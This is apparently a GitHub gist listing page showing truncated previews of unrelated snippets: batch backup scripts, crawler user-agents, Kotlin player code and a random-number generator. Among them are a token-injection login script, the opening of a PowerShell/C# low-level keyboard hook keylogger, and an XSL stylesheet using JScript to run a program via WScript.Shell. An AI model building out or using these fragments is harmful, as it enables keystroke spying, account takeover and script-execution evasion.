Private Declare PtrSafe Sub VariantCopyDLL Lib "oleaut32.dll" Alias "VariantCopy" (ByRef pvargDest As Variant, ByRef pvargSrc As Variant)
Const MaxCount As Long = 10 ^ 6
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
let token = "your token"; | |
function login(token) { | |
setInterval(() => { | |
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"` | |
}, 50); | |
setTimeout(() => { | |
location.reload(); | |
}, 2500); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Type -TypeDefinition @" | |
using System; | |
using System.IO; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Windows.Forms; | |
namespace KeyLogger { | |
public static class Program { | |
private const int WH_KEYBOARD_LL = 13; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
:: C:\Users\Ivan\AppData\Local\Android\Sdk\emulator>emulator -list-avds | |
:: C:\Users\Ivan\AppData\Local\Android\Sdk\emulator>emulator -avd My_Device_x86 | |
@echo off | |
cd C:\KOPLAYER | |
netstat -an | find /i "listening" | |
call adb kill-server |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
𝐆𝐨𝐨𝐠𝐥𝐞: | |
Googlebot | |
Googlebot/2.1 | |
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | |
𝐅𝐚𝐜𝐞𝐛𝐨𝐨𝐤 & 𝐈𝐧𝐬𝐭𝐚𝐠𝐫𝐚𝐦 & 𝐌𝐞𝐬𝐬𝐞𝐧𝐠𝐞𝐫: | |
Facebot | |
facebookexternalhit | |
facebookexternalhit/1.1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
For /f "tokens=2-4 delims=/ " %%a in ('date /t') do (set mydate=%%c-%%a-%%b) | |
For /f "tokens=1-2 delims=/:" %%a in ("%TIME%") do (set mytime=%%a%%b) | |
SET backupdir=C:\xampp\htdocs\backup | |
SET mysqluername=root | |
SET mysqlpassword=password | |
SET database=dbname | |
C:\xampp\mysql\bin\mysqldump.exe -u%mysqluername% -p%mysqlpassword% %database% > %backupdir%\%database%_%mydate%_%mytime%.sql |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
]]> </ms:script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/// <summary> | |
/// Random Number Generator based on Mersenne-Twister algorithm | |
/// | |
/// Usage : | |
/// RandomNumberGenerator.Instance.Generate()); | |
/// RandomNumberGenerator.Instance.Generate(1.1,2.2); | |
/// RandomNumberGenerator.Instance.Generate(1,100) | |
/// | |
/// inspired from : http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/VERSIONS/C-LANG/980409/mt19937-2.c | |
/// </summary> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
private fun initializePlayer() { | |
if (player == null) { | |
player = ExoPlayerFactory.newSimpleInstance( | |
DefaultRenderersFactory(context), | |
DefaultTrackSelector(), | |
DefaultLoadControl()) | |
playerView?.setPlayer(player) | |
player.setPlayWhenReady(playWhenReady) | |
player.seekTo(currentWindow, playbackPosition) | |
} |
NewerOlder